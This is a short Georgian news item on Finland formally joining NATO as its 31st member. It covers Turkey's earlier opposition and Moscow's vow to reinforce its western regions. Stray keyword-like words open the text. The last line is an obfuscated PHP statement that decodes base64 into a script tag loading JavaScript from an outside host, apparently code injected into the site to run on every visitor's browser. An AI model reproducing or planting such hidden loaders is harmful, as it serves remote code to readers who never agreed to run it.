celsiusi
ავერსი საქკაბელი

ფინეთი დღეს ნატო-ს წევრი 31-ე ქვეყანა გახდება. პროცედურების თანახმად, ბრიუსელში ფინეთის საგარეო საქმეთა მინისტრი ოფიციალურ დოკუმენტს აშშ-ის სახელმწიფო მდივანს, ენტონი ბლინკენს გადასცემს. საბოლოოდ კი ქვეყნის დროშა ნატო-ს შტაბბინაში საფრანგეთისა და ესტონეთის დროშებს შორის აღიმართება.

ფინეთმა ნატო-ში ინტეგრირება რუსეთ-უკრაინის ომის დაწყების შემდეგ გადაწყვიტა, ალიანსში გაწევრიანება კი ქვეყნისთვის ნეიტრალიტეტის დასასრულს გულისხმობს.

იმის მიუხედავად, რომ თურქეთი დიდი ხნის განმავლობაში ნატო-ში ფინეთის გაწევრიანების წინააღმდეგი იყო, უკრაინის ომის ფონზე ფინეთმა ისტორიაში ყველაზე სწრაფად მოახერხა ჩრდილოატლანტიკურ ალიანსში ინტეგრირება.

მოსკოვში აცხადებენ, რომ ამ პროცესის საპასუხოდ ქვეყანა გააძლიერებს სამხედრო შესაძლებლობებს დასავლეთ და ჩრდილო-დასავლეთ რეგიონებში.

373
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");